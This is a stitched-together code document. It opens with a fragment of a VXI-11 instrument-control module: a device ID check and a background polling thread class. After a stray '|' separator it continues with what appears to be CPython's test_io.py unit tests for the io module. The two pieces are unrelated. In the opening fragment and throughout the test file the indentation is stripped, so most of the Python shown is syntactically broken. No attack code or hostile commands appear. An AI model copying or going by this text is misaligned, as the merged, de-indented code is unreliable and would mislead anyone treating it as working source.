check=idn.find(self.idn_head)
self.idn=idn.strip() #save for future reference info
if check:
self.disconnect()
assert check==0, "Wrong device type! expecting: "+self.idn_head+"... got: "+self.idn
else:
self.idn="Device *idn? not checked!"
import copy
class device_thread:
    """Background polling loop for a vxi_11 connection.

    monitor() runs in a thread that repeatedly locks the device, calls
    get_data() (to be supplied by a subclass or mix-in target), unlocks,
    and sleeps main_sleep seconds between passes. Only a weak reference
    to the connection is held so the thread never keeps the device
    object alive by itself.
    """
    Thread=threading.Thread #by default, use canonical threads

    def __init__(self, connection, main_sleep=1.0, name="Device"):
        self.running=0 #true while the monitor thread is alive
        self.main_sleep=main_sleep #seconds between polling passes
        self.__thread=None
        self.__name=copy.copy(name) #make a new copy to avoid a possible circular reference
        self.__wait_event=threading.Event() #set to cancel the inter-pass sleep
        self.set_connection(connection)

    def set_connection(self, connection):
        #keep only a weak reference, so the thread cannot prevent the device from being deleted
        #such deletion creates an error when the thread tries to run, but that's OK
        #this allows the device_thread to be used as a clean mix-in class to a vxi_11 connection
        self.__weak_connection=weakref.ref(connection)

    def connection(self):
        return self.__weak_connection() #dereference weak reference

    def handle_lock_error(self):
        "handle_lock_error can be overridden to count failures and do something if there are too many"
        # BUG FIX: this previously read self.name, which is never assigned
        # (the constructor stores the name-mangled self.__name), so a lock
        # failure raised AttributeError instead of being logged.
        self.connection().log_exception(self.__name+": Error while locking device")

    def onepass(self):
        "run one lock / get_data / unlock polling cycle"
        connection=self.connection()
        try:
            connection.lock()
        except VXI_11_Transient_Error:
            self.handle_lock_error()
            return
        try:
            self.get_data()
        except:
            connection.log_traceback('Uncaught exception in get_data()')
            try:
                connection.clear()
            except:
                connection.log_exception('failed to clear connection after error')
            self.run=0 #a get_data failure stops the monitor loop
        connection.unlock()

    def monitor(self):
        "thread main loop: poll until self.run is cleared or a fatal error occurs"
        self.connection().log_info("Monitor loop entered")
        while(self.run):
            try:
                self.onepass()
                self.__wait_event.wait(self.main_sleep) #wait until timeout or we are cancelled
            except KeyboardInterrupt:
                self.connection().log_error("Keyboard Interrupt... terminating")
                self.run=0
            except:
                self.connection().log_traceback()
                self.run=0
        self.running=0
        self.connection().unlock_completely() #drop any locks left over from an aborted pass

    def run_thread(self):
        "start the monitor thread if it is not already running"
        if not self.running: #if it's already running, just keep it up.
            self.run=1
            self.__thread=self.Thread(target=self.monitor, name=self.__name)
            self.__wait_event.clear() #make sure we don't fall through immediately
            self.__thread.start()
            self.running=1

    def get_monitor_thread(self):
        return self.__thread

    def stop_thread(self):
        "request a clean shutdown of the monitor thread"
        if self.running:
            self.run=0
            self.__wait_event.set() #cancel any waiting
|
test_io.py | """Unit tests for the io module."""
# Tests of io are scattered over the test suite:
# * test_bufio - tests file buffering
# * test_memoryio - tests BytesIO and StringIO
# * test_fileio - tests FileIO
# * test_file - tests the file interface
# * test_io - tests everything else in the io module
# * test_univnewlines - tests universal newline support
# * test_largefile - tests operations on a file greater than 2**32 bytes
# (only enabled with -ulargefile)
################################################################################
# ATTENTION TEST WRITERS!!!
################################################################################
# When writing tests for io, it's important to test both the C and Python
# implementations. This is usually done by writing a base test that refers to
# the type it is testing as an attribute. Then it provides custom subclasses to
# test both implementations. This file has lots of examples.
################################################################################
import abc
import array
import errno
import locale
import os
import pickle
import random
import signal
import sys
import sysconfig
import threading
import time
import unittest
import warnings
import weakref
from collections import deque, UserList
from itertools import cycle, count
from test import support
from test.support.script_helper import assert_python_ok, run_python_until_end
from test.support import FakePath
import codecs
import io # C implementation of io
import _pyio as pyio # Python implementation of io
try:
import ctypes
except ImportError:
def byteslike(*pos, **kw):
return array.array("b", bytes(*pos, **kw))
else:
def byteslike(*pos, **kw):
"""Create a bytes-like object having no string or sequence methods"""
data = bytes(*pos, **kw)
obj = EmptyStruct()
ctypes.resize(obj, len(data))
memoryview(obj).cast("B")[:] = data
return obj
class EmptyStruct(ctypes.Structure):
pass
_cflags = sysconfig.get_config_var('CFLAGS') or ''
_config_args = sysconfig.get_config_var('CONFIG_ARGS') or ''
MEMORY_SANITIZER = (
'-fsanitize=memory' in _cflags or
'--with-memory-sanitizer' in _config_args
)
def _default_chunk_size():
"""Get the default TextIOWrapper chunk size"""
with open(__file__, "r", encoding="latin-1") as f:
return f._CHUNK_SIZE
class MockRawIOWithoutRead:
"""A RawIO implementation without read(), so as to exercise the default
RawIO.read() which calls readinto()."""
def __init__(self, read_stack=()):
self._read_stack = list(read_stack)
self._write_stack = []
self._reads = 0
self._extraneous_reads = 0
def write(self, b):
self._write_stack.append(bytes(b))
return len(b)
def writable(self):
return True
def fileno(self):
return 42
def readable(self):
return True
def seekable(self):
return True
def seek(self, pos, whence):
return 0 # wrong but we gotta return something
def tell(self):
return 0 # same comment as above
def readinto(self, buf):
self._reads += 1
max_len = len(buf)
try:
data = self._read_stack[0]
except IndexError:
self._extraneous_reads += 1
return 0
if data is None:
del self._read_stack[0]
return None
n = len(data)
if len(data) <= max_len:
del self._read_stack[0]
buf[:n] = data
return n
else:
buf[:] = data[:max_len]
self._read_stack[0] = data[max_len:]
return max_len
def truncate(self, pos=None):
return pos
class CMockRawIOWithoutRead(MockRawIOWithoutRead, io.RawIOBase):
pass
class PyMockRawIOWithoutRead(MockRawIOWithoutRead, pyio.RawIOBase):
pass
class MockRawIO(MockRawIOWithoutRead):
def read(self, n=None):
self._reads += 1
try:
return self._read_stack.pop(0)
except:
self._extraneous_reads += 1
return b""
class CMockRawIO(MockRawIO, io.RawIOBase):
pass
class PyMockRawIO(MockRawIO, pyio.RawIOBase):
pass
class MisbehavedRawIO(MockRawIO):
def write(self, b):
return super().write(b) * 2
def read(self, n=None):
return super().read(n) * 2
def seek(self, pos, whence):
return -123
def tell(self):
return -456
def readinto(self, buf):
super().readinto(buf)
return len(buf) * 5
class CMisbehavedRawIO(MisbehavedRawIO, io.RawIOBase):
pass
class PyMisbehavedRawIO(MisbehavedRawIO, pyio.RawIOBase):
pass
class SlowFlushRawIO(MockRawIO):
def __init__(self):
super().__init__()
self.in_flush = threading.Event()
def flush(self):
self.in_flush.set()
time.sleep(0.25)
class CSlowFlushRawIO(SlowFlushRawIO, io.RawIOBase):
pass
class PySlowFlushRawIO(SlowFlushRawIO, pyio.RawIOBase):
pass
class CloseFailureIO(MockRawIO):
closed = 0
def close(self):
if not self.closed:
self.closed = 1
raise OSError
class CCloseFailureIO(CloseFailureIO, io.RawIOBase):
pass
class PyCloseFailureIO(CloseFailureIO, pyio.RawIOBase):
pass
class MockFileIO:
def __init__(self, data):
self.read_history = []
super().__init__(data)
def read(self, n=None):
res = super().read(n)
self.read_history.append(None if res is None else len(res))
return res
def readinto(self, b):
res = super().readinto(b)
self.read_history.append(res)
return res
class CMockFileIO(MockFileIO, io.BytesIO):
pass
class PyMockFileIO(MockFileIO, pyio.BytesIO):
pass
class MockUnseekableIO:
def seekable(self):
return False
def seek(self, *args):
raise self.UnsupportedOperation("not seekable")
def tell(self, *args):
raise self.UnsupportedOperation("not seekable")
def truncate(self, *args):
raise self.UnsupportedOperation("not seekable")
class CMockUnseekableIO(MockUnseekableIO, io.BytesIO):
UnsupportedOperation = io.UnsupportedOperation
class PyMockUnseekableIO(MockUnseekableIO, pyio.BytesIO):
UnsupportedOperation = pyio.UnsupportedOperation
class MockNonBlockWriterIO:
def __init__(self):
self._write_stack = []
self._blocker_char = None
def pop_written(self):
s = b"".join(self._write_stack)
self._write_stack[:] = []
return s
def block_on(self, char):
"""Block when a given char is encountered."""
self._blocker_char = char
def readable(self):
return True
def seekable(self):
return True
def writable(self):
return True
def write(self, b):
b = bytes(b)
n = -1
if self._blocker_char:
try:
n = b.index(self._blocker_char)
except ValueError:
pass
else:
if n > 0:
# write data up to the first blocker
self._write_stack.append(b[:n])
return n
else:
# cancel blocker and indicate would block
self._blocker_char = None
return None
self._write_stack.append(b)
return len(b)
class CMockNonBlockWriterIO(MockNonBlockWriterIO, io.RawIOBase):
BlockingIOError = io.BlockingIOError
class PyMockNonBlockWriterIO(MockNonBlockWriterIO, pyio.RawIOBase):
BlockingIOError = pyio.BlockingIOError
class IOTest(unittest.TestCase):
def setUp(self):
support.unlink(support.TESTFN)
def tearDown(self):
support.unlink(support.TESTFN)
def write_ops(self, f):
self.assertEqual(f.write(b"blah."), 5)
f.truncate(0)
self.assertEqual(f.tell(), 5)
f.seek(0)
self.assertEqual(f.write(b"blah."), 5)
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.write(b"Hello."), 6)
self.assertEqual(f.tell(), 6)
self.assertEqual(f.seek(-1, 1), 5)
self.assertEqual(f.tell(), 5)
buffer = bytearray(b" world\n\n\n")
self.assertEqual(f.write(buffer), 9)
buffer[:] = b"*" * 9 # Overwrite our copy of the data
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.write(b"h"), 1)
self.assertEqual(f.seek(-1, 2), 13)
self.assertEqual(f.tell(), 13)
self.assertEqual(f.truncate(12), 12)
self.assertEqual(f.tell(), 13)
self.assertRaises(TypeError, f.seek, 0.0)
def read_ops(self, f, buffered=False):
data = f.read(5)
self.assertEqual(data, b"hello")
data = byteslike(data)
self.assertEqual(f.readinto(data), 5)
self.assertEqual(bytes(data), b" worl")
data = bytearray(5)
self.assertEqual(f.readinto(data), 2)
self.assertEqual(len(data), 5)
self.assertEqual(data[:2], b"d\n")
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.read(20), b"hello world\n")
self.assertEqual(f.read(1), b"")
self.assertEqual(f.readinto(byteslike(b"x")), 0)
self.assertEqual(f.seek(-6, 2), 6)
self.assertEqual(f.read(5), b"world")
self.assertEqual(f.read(0), b"")
self.assertEqual(f.readinto(byteslike()), 0)
self.assertEqual(f.seek(-6, 1), 5)
self.assertEqual(f.read(5), b" worl")
self.assertEqual(f.tell(), 10)
self.assertRaises(TypeError, f.seek, 0.0)
if buffered:
f.seek(0)
self.assertEqual(f.read(), b"hello world\n")
f.seek(6)
self.assertEqual(f.read(), b"world\n")
self.assertEqual(f.read(), b"")
f.seek(0)
data = byteslike(5)
self.assertEqual(f.readinto1(data), 5)
self.assertEqual(bytes(data), b"hello")
LARGE = 2**31
def large_file_ops(self, f):
assert f.readable()
assert f.writable()
try:
self.assertEqual(f.seek(self.LARGE), self.LARGE)
except (OverflowError, ValueError):
self.skipTest("no largefile support")
self.assertEqual(f.tell(), self.LARGE)
self.assertEqual(f.write(b"xxx"), 3)
self.assertEqual(f.tell(), self.LARGE + 3)
self.assertEqual(f.seek(-1, 1), self.LARGE + 2)
self.assertEqual(f.truncate(), self.LARGE + 2)
self.assertEqual(f.tell(), self.LARGE + 2)
self.assertEqual(f.seek(0, 2), self.LARGE + 2)
self.assertEqual(f.truncate(self.LARGE + 1), self.LARGE + 1)
self.assertEqual(f.tell(), self.LARGE + 2)
self.assertEqual(f.seek(0, 2), self.LARGE + 1)
self.assertEqual(f.seek(-1, 2), self.LARGE)
self.assertEqual(f.read(2), b"x")
def test_invalid_operations(self):
# Try writing on a file opened in read mode and vice-versa.
exc = self.UnsupportedOperation
for mode in ("w", "wb"):
with self.open(support.TESTFN, mode) as fp:
self.assertRaises(exc, fp.read)
self.assertRaises(exc, fp.readline)
with self.open(support.TESTFN, "wb", buffering=0) as fp:
self.assertRaises(exc, fp.read)
self.assertRaises(exc, fp.readline)
with self.open(support.TESTFN, "rb", buffering=0) as fp:
self.assertRaises(exc, fp.write, b"blah")
self.assertRaises(exc, fp.writelines, [b"blah\n"])
with self.open(support.TESTFN, "rb") as fp:
self.assertRaises(exc, fp.write, b"blah")
self.assertRaises(exc, fp.writelines, [b"blah\n"])
with self.open(support.TESTFN, "r") as fp:
self.assertRaises(exc, fp.write, "blah")
self.assertRaises(exc, fp.writelines, ["blah\n"])
# Non-zero seeking from current or end pos
self.assertRaises(exc, fp.seek, 1, self.SEEK_CUR)
self.assertRaises(exc, fp.seek, -1, self.SEEK_END)
def test_optional_abilities(self):
# Test for OSError when optional APIs are not supported
# The purpose of this test is to try fileno(), reading, writing and
# seeking operations with various objects that indicate they do not
# support these operations.
def pipe_reader():
[r, w] = os.pipe()
os.close(w) # So that read() is harmless
return self.FileIO(r, "r")
def pipe_writer():
[r, w] = os.pipe()
self.addCleanup(os.close, r)
# Guarantee that we can write into the pipe without blocking
thread = threading.Thread(target=os.read, args=(r, 100))
thread.start()
self.addCleanup(thread.join)
return self.FileIO(w, "w")
def buffered_reader():
return self.BufferedReader(self.MockUnseekableIO())
def buffered_writer():
return self.BufferedWriter(self.MockUnseekableIO())
def buffered_random():
return self.BufferedRandom(self.BytesIO())
def buffered_rw_pair():
return self.BufferedRWPair(self.MockUnseekableIO(),
self.MockUnseekableIO())
def text_reader():
class UnseekableReader(self.MockUnseekableIO):
writable = self.BufferedIOBase.writable
write = self.BufferedIOBase.write
return self.TextIOWrapper(UnseekableReader(), "ascii")
def text_writer():
class UnseekableWriter(self.MockUnseekableIO):
readable = self.BufferedIOBase.readable
read = self.BufferedIOBase.read
return self.TextIOWrapper(UnseekableWriter(), "ascii")
tests = (
(pipe_reader, "fr"), (pipe_writer, "fw"),
(buffered_reader, "r"), (buffered_writer, "w"),
(buffered_random, "rws"), (buffered_rw_pair, "rw"),
(text_reader, "r"), (text_writer, "w"),
(self.BytesIO, "rws"), (self.StringIO, "rws"),
)
for [test, abilities] in tests:
with self.subTest(test), test() as obj:
readable = "r" in abilities
self.assertEqual(obj.readable(), readable)
writable = "w" in abilities
self.assertEqual(obj.writable(), writable)
if isinstance(obj, self.TextIOBase):
data = "3"
elif isinstance(obj, (self.BufferedIOBase, self.RawIOBase)):
data = b"3"
else:
self.fail("Unknown base class")
if "f" in abilities:
obj.fileno()
else:
self.assertRaises(OSError, obj.fileno)
if readable:
obj.read(1)
obj.read()
else:
self.assertRaises(OSError, obj.read, 1)
self.assertRaises(OSError, obj.read)
if writable:
obj.write(data)
else:
self.assertRaises(OSError, obj.write, data)
if sys.platform.startswith("win") and test in (
pipe_reader, pipe_writer):
# Pipes seem to appear as seekable on Windows
continue
seekable = "s" in abilities
self.assertEqual(obj.seekable(), seekable)
if seekable:
obj.tell()
obj.seek(0)
else:
self.assertRaises(OSError, obj.tell)
self.assertRaises(OSError, obj.seek, 0)
if writable and seekable:
obj.truncate()
obj.truncate(0)
else:
self.assertRaises(OSError, obj.truncate)
self.assertRaises(OSError, obj.truncate, 0)
def test_open_handles_NUL_chars(self):
fn_with_NUL = 'foo\0bar'
self.assertRaises(ValueError, self.open, fn_with_NUL, 'w')
bytes_fn = bytes(fn_with_NUL, 'ascii')
with warnings.catch_warnings():
warnings.simplefilter("ignore", DeprecationWarning)
self.assertRaises(ValueError, self.open, bytes_fn, 'w')
def test_raw_file_io(self):
with self.open(support.TESTFN, "wb", buffering=0) as f:
self.assertEqual(f.readable(), False)
self.assertEqual(f.writable(), True)
self.assertEqual(f.seekable(), True)
self.write_ops(f)
with self.open(support.TESTFN, "rb", buffering=0) as f:
self.assertEqual(f.readable(), True)
self.assertEqual(f.writable(), False)
self.assertEqual(f.seekable(), True)
self.read_ops(f)
def test_buffered_file_io(self):
with self.open(support.TESTFN, "wb") as f:
self.assertEqual(f.readable(), False)
self.assertEqual(f.writable(), True)
self.assertEqual(f.seekable(), True)
self.write_ops(f)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.readable(), True)
self.assertEqual(f.writable(), False)
self.assertEqual(f.seekable(), True)
self.read_ops(f, True)
def test_readline(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"abc\ndef\nxyzzy\nfoo\x00bar\nanother line")
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.readline(), b"abc\n")
self.assertEqual(f.readline(10), b"def\n")
self.assertEqual(f.readline(2), b"xy")
self.assertEqual(f.readline(4), b"zzy\n")
self.assertEqual(f.readline(), b"foo\x00bar\n")
self.assertEqual(f.readline(None), b"another line")
self.assertRaises(TypeError, f.readline, 5.3)
with self.open(support.TESTFN, "r") as f:
self.assertRaises(TypeError, f.readline, 5.3)
def test_readline_nonsizeable(self):
# Issue #30061
# Crash when readline() returns an object without __len__
class R(self.IOBase):
def readline(self):
return None
self.assertRaises((TypeError, StopIteration), next, R())
def test_next_nonsizeable(self):
# Issue #30061
# Crash when __next__() returns an object without __len__
class R(self.IOBase):
def __next__(self):
return None
self.assertRaises(TypeError, R().readlines, 1)
def test_raw_bytes_io(self):
f = self.BytesIO()
self.write_ops(f)
data = f.getvalue()
self.assertEqual(data, b"hello world\n")
f = self.BytesIO(data)
self.read_ops(f, True)
def test_large_file_ops(self):
# On Windows and Mac OSX this test consumes large resources; It takes
# a long time to build the >2 GiB file and takes >2 GiB of disk space
# therefore the resource must be enabled to run this test.
if sys.platform[:3] == 'win' or sys.platform == 'darwin':
support.requires(
'largefile',
'test requires %s bytes and a long time to run' % self.LARGE)
with self.open(support.TESTFN, "w+b", 0) as f:
self.large_file_ops(f)
with self.open(support.TESTFN, "w+b") as f:
self.large_file_ops(f)
def test_with_open(self):
for bufsize in (0, 1, 100):
f = None
with self.open(support.TESTFN, "wb", bufsize) as f:
f.write(b"xxx")
self.assertEqual(f.closed, True)
f = None
try:
with self.open(support.TESTFN, "wb", bufsize) as f:
1/0
except ZeroDivisionError:
self.assertEqual(f.closed, True)
else:
self.fail("1/0 didn't raise an exception")
# issue 5008
def test_append_mode_tell(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"xxx")
with self.open(support.TESTFN, "ab", buffering=0) as f:
self.assertEqual(f.tell(), 3)
with self.open(support.TESTFN, "ab") as f:
self.assertEqual(f.tell(), 3)
with self.open(support.TESTFN, "a") as f:
self.assertGreater(f.tell(), 0)
def test_destructor(self):
record = []
class MyFileIO(self.FileIO):
def __del__(self):
record.append(1)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super().close()
def flush(self):
record.append(3)
super().flush()
with support.check_warnings(('', ResourceWarning)):
f = MyFileIO(support.TESTFN, "wb")
f.write(b"xxx")
del f
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"xxx")
def _check_base_destructor(self, base):
record = []
class MyIO(base):
def __init__(self):
# This exercises the availability of attributes on object
# destruction.
# (in the C version, close() is called by the tp_dealloc
# function, not by __del__)
self.on_del = 1
self.on_close = 2
self.on_flush = 3
def __del__(self):
record.append(self.on_del)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(self.on_close)
super().close()
def flush(self):
record.append(self.on_flush)
super().flush()
f = MyIO()
del f
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
def test_IOBase_destructor(self):
self._check_base_destructor(self.IOBase)
def test_RawIOBase_destructor(self):
self._check_base_destructor(self.RawIOBase)
def test_BufferedIOBase_destructor(self):
self._check_base_destructor(self.BufferedIOBase)
def test_TextIOBase_destructor(self):
self._check_base_destructor(self.TextIOBase)
def test_close_flushes(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"xxx")
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"xxx")
def test_array_writes(self):
a = array.array('i', range(10))
n = len(a.tobytes())
def check(f):
with f:
self.assertEqual(f.write(a), n)
f.writelines((a,))
check(self.BytesIO())
check(self.FileIO(support.TESTFN, "w"))
check(self.BufferedWriter(self.MockRawIO()))
check(self.BufferedRandom(self.MockRawIO()))
check(self.BufferedRWPair(self.MockRawIO(), self.MockRawIO()))
def test_closefd(self):
self.assertRaises(ValueError, self.open, support.TESTFN, 'w',
closefd=False)
def test_read_closed(self):
with self.open(support.TESTFN, "w") as f:
f.write("egg\n")
with self.open(support.TESTFN, "r") as f:
file = self.open(f.fileno(), "r", closefd=False)
self.assertEqual(file.read(), "egg\n")
file.seek(0)
file.close()
self.assertRaises(ValueError, file.read)
def test_no_closefd_with_filename(self):
# can't use closefd in combination with a file name
self.assertRaises(ValueError, self.open, support.TESTFN, "r", closefd=False)
def test_closefd_attr(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"egg\n")
with self.open(support.TESTFN, "r") as f:
self.assertEqual(f.buffer.raw.closefd, True)
file = self.open(f.fileno(), "r", closefd=False)
self.assertEqual(file.buffer.raw.closefd, False)
def test_garbage_collection(self):
# FileIO objects are collected, and collecting them flushes
# all data to disk.
with support.check_warnings(('', ResourceWarning)):
f = self.FileIO(support.TESTFN, "wb")
f.write(b"abcxxx")
f.f = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertIsNone(wr(), wr)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"abcxxx")
def test_unbounded_file(self):
# Issue #1174606: reading from an unbounded stream such as /dev/zero.
zero = "/dev/zero"
if not os.path.exists(zero):
self.skipTest("{0} does not exist".format(zero))
if sys.maxsize > 0x7FFFFFFF:
self.skipTest("test can only run in a 32-bit address space")
if support.real_max_memuse < support._2G:
self.skipTest("test requires at least 2 GiB of memory")
with self.open(zero, "rb", buffering=0) as f:
self.assertRaises(OverflowError, f.read)
with self.open(zero, "rb") as f:
self.assertRaises(OverflowError, f.read)
with self.open(zero, "r") as f:
self.assertRaises(OverflowError, f.read)
def check_flush_error_on_close(self, *args, **kwargs):
# Test that the file is closed despite failed flush
# and that flush() is called before file closed.
f = self.open(*args, **kwargs)
closed = []
def bad_flush():
closed[:] = [f.closed]
raise OSError()
f.flush = bad_flush
self.assertRaises(OSError, f.close) # exception not swallowed
self.assertTrue(f.closed)
self.assertTrue(closed) # flush() called
self.assertFalse(closed[0]) # flush() called before file closed
f.flush = lambda: None # break reference loop
def test_flush_error_on_close(self):
# raw file
# Issue #5700: io.FileIO calls flush() after file closed
self.check_flush_error_on_close(support.TESTFN, 'wb', buffering=0)
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb', buffering=0)
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb', buffering=0, closefd=False)
os.close(fd)
# buffered io
self.check_flush_error_on_close(support.TESTFN, 'wb')
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb')
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb', closefd=False)
os.close(fd)
# text io
self.check_flush_error_on_close(support.TESTFN, 'w')
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'w')
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'w', closefd=False)
os.close(fd)
def test_multi_close(self):
f = self.open(support.TESTFN, "wb", buffering=0)
f.close()
f.close()
f.close()
self.assertRaises(ValueError, f.flush)
def test_RawIOBase_read(self):
# Exercise the default limited RawIOBase.read(n) implementation (which
# calls readinto() internally).
rawio = self.MockRawIOWithoutRead((b"abc", b"d", None, b"efg", None))
self.assertEqual(rawio.read(2), b"ab")
self.assertEqual(rawio.read(2), b"c")
self.assertEqual(rawio.read(2), b"d")
self.assertEqual(rawio.read(2), None)
self.assertEqual(rawio.read(2), b"ef")
self.assertEqual(rawio.read(2), b"g")
self.assertEqual(rawio.read(2), None)
self.assertEqual(rawio.read(2), b"")
def test_types_have_dict(self):
test = (
self.IOBase(),
self.RawIOBase(),
self.TextIOBase(),
self.StringIO(),
self.BytesIO()
)
for obj in test:
self.assertTrue(hasattr(obj, "__dict__"))
def test_opener(self):
with self.open(support.TESTFN, "w") as f:
f.write("egg\n")
fd = os.open(support.TESTFN, os.O_RDONLY)
def opener(path, flags):
return fd
with self.open("non-existent", "r", opener=opener) as f:
self.assertEqual(f.read(), "egg\n")
def test_bad_opener_negative_1(self):
# Issue #27066.
def badopener(fname, flags):
return -1
with self.assertRaises(ValueError) as cm:
open('non-existent', 'r', opener=badopener)
self.assertEqual(str(cm.exception), 'opener returned -1')
def test_bad_opener_other_negative(self):
# Issue #27066.
def badopener(fname, flags):
return -2
with self.assertRaises(ValueError) as cm:
open('non-existent', 'r', opener=badopener)
self.assertEqual(str(cm.exception), 'opener returned -2')
def test_fileio_closefd(self):
# Issue #4841
with self.open(__file__, 'rb') as f1, \
self.open(__file__, 'rb') as f2:
fileio = self.FileIO(f1.fileno(), closefd=False)
# .__init__() must not close f1
fileio.__init__(f2.fileno(), closefd=False)
f1.readline()
# .close() must not close f2
fileio.close()
f2.readline()
def test_nonbuffered_textio(self):
with support.check_no_resource_warning(self):
with self.assertRaises(ValueError):
self.open(support.TESTFN, 'w', buffering=0)
def test_invalid_newline(self):
with support.check_no_resource_warning(self):
with self.assertRaises(ValueError):
self.open(support.TESTFN, 'w', newline='invalid')
def test_buffered_readinto_mixin(self):
# Test the implementation provided by BufferedIOBase
class Stream(self.BufferedIOBase):
def read(self, size):
return b"12345"
read1 = read
stream = Stream()
for method in ("readinto", "readinto1"):
with self.subTest(method):
buffer = byteslike(5)
self.assertEqual(getattr(stream, method)(buffer), 5)
self.assertEqual(bytes(buffer), b"12345")
def test_fspath_support(self):
def check_path_succeeds(path):
with self.open(path, "w") as f:
f.write("egg\n")
with self.open(path, "r") as f:
self.assertEqual(f.read(), "egg\n")
check_path_succeeds(FakePath(support.TESTFN))
check_path_succeeds(FakePath(support.TESTFN.encode('utf-8')))
with self.open(support.TESTFN, "w") as f:
bad_path = FakePath(f.fileno())
with self.assertRaises(TypeError):
self.open(bad_path, 'w')
bad_path = FakePath(None)
with self.assertRaises(TypeError):
self.open(bad_path, 'w')
bad_path = FakePath(FloatingPointError)
with self.assertRaises(FloatingPointError):
self.open(bad_path, 'w')
# ensure that refcounting is correct with some error conditions
with self.assertRaisesRegex(ValueError, 'read/write/append mode'):
self.open(FakePath(support.TESTFN), 'rwxa')
def test_RawIOBase_readall(self):
# Exercise the default unlimited RawIOBase.read() and readall()
# implementations.
rawio = self.MockRawIOWithoutRead((b"abc", b"d", b"efg"))
self.assertEqual(rawio.read(), b"abcdefg")
rawio = self.MockRawIOWithoutRead((b"abc", b"d", b"efg"))
self.assertEqual(rawio.readall(), b"abcdefg")
def test_BufferedIOBase_readinto(self):
# Exercise the default BufferedIOBase.readinto() and readinto1()
# implementations (which call read() or read1() internally).
class Reader(self.BufferedIOBase):
def __init__(self, avail):
self.avail = avail
def read(self, size):
result = self.avail[:size]
self.avail = self.avail[size:]
return result
def read1(self, size):
"""Returns no more than 5 bytes at once"""
return self.read(min(size, 5))
tests = (
# (test method, total data available, read buffer size, expected
# read size)
("readinto", 10, 5, 5),
("readinto", 10, 6, 6), # More than read1() can return
("readinto", 5, 6, 5), # Buffer larger than total available
("readinto", 6, 7, 6),
("readinto", 10, 0, 0), # Empty buffer
("readinto1", 10, 5, 5), # Result limited to single read1() call
("readinto1", 10, 6, 5), # Buffer larger than read1() can return
("readinto1", 5, 6, 5), # Buffer larger than total available
("readinto1", 6, 7, 5),
("readinto1", 10, 0, 0), # Empty buffer
)
UNUSED_BYTE = 0x81
for test in tests:
with self.subTest(test):
method, avail, request, result = test
reader = Reader(bytes(range(avail)))
buffer = bytearray((UNUSED_BYTE,) * request)
method = getattr(reader, method)
self.assertEqual(method(buffer), result)
self.assertEqual(len(buffer), request)
self.assertSequenceEqual(buffer[:result], range(result))
unused = (UNUSED_BYTE,) * (request - result)
self.assertSequenceEqual(buffer[result:], unused)
self.assertEqual(len(reader.avail), avail - result)
def test_close_assert(self):
class R(self.IOBase):
def __setattr__(self, name, value):
pass
def flush(self):
raise OSError()
f = R()
# This would cause an assertion failure.
self.assertRaises(OSError, f.close)
class CIOTest(IOTest):
def test_IOBase_finalize(self):
# Issue #12149: segmentation fault on _PyIOBase_finalize when both a
# class which inherits IOBase and an object of this class are caught
# in a reference cycle and close() is already in the method cache.
class MyIO(self.IOBase):
def close(self):
pass
# create an instance to populate the method cache
MyIO()
obj = MyIO()
obj.obj = obj
wr = weakref.ref(obj)
del MyIO
del obj
support.gc_collect()
self.assertIsNone(wr(), wr)
class PyIOTest(IOTest):
pass
@support.cpython_only
class APIMismatchTest(unittest.TestCase):
def test_RawIOBase_io_in_pyio_match(self):
"""Test that pyio RawIOBase class has all c RawIOBase methods"""
mismatch = support.detect_api_mismatch(pyio.RawIOBase, io.RawIOBase,
ignore=('__weakref__',))
self.assertEqual(mismatch, set(), msg='Python RawIOBase does not have all C RawIOBase methods')
def test_RawIOBase_pyio_in_io_match(self):
"""Test that c RawIOBase class has all pyio RawIOBase methods"""
mismatch = support.detect_api_mismatch(io.RawIOBase, pyio.RawIOBase)
self.assertEqual(mismatch, set(), msg='C RawIOBase does not have all Python RawIOBase methods')
class CommonBufferedTests:
# Tests common to BufferedReader, BufferedWriter and BufferedRandom
def test_detach(self):
raw = self.MockRawIO()
buf = self.tp(raw)
self.assertIs(buf.detach(), raw)
self.assertRaises(ValueError, buf.detach)
repr(buf) # Should still work
def test_fileno(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertEqual(42, bufio.fileno())
def test_invalid_args(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
# Invalid whence
self.assertRaises(ValueError, bufio.seek, 0, -1)
self.assertRaises(ValueError, bufio.seek, 0, 9)
def test_override_destructor(self):
tp = self.tp
record = []
class MyBufferedIO(tp):
def __del__(self):
record.append(1)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super().close()
def flush(self):
record.append(3)
super().flush()
rawio = self.MockRawIO()
bufio = MyBufferedIO(rawio)
del bufio
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
def test_context_manager(self):
# Test usability as a context manager
rawio = self.MockRawIO()
bufio = self.tp(rawio)
def _with():
with bufio:
pass
_with()
# bufio should now be closed, and using it a second time should raise
# a ValueError.
self.assertRaises(ValueError, _with)
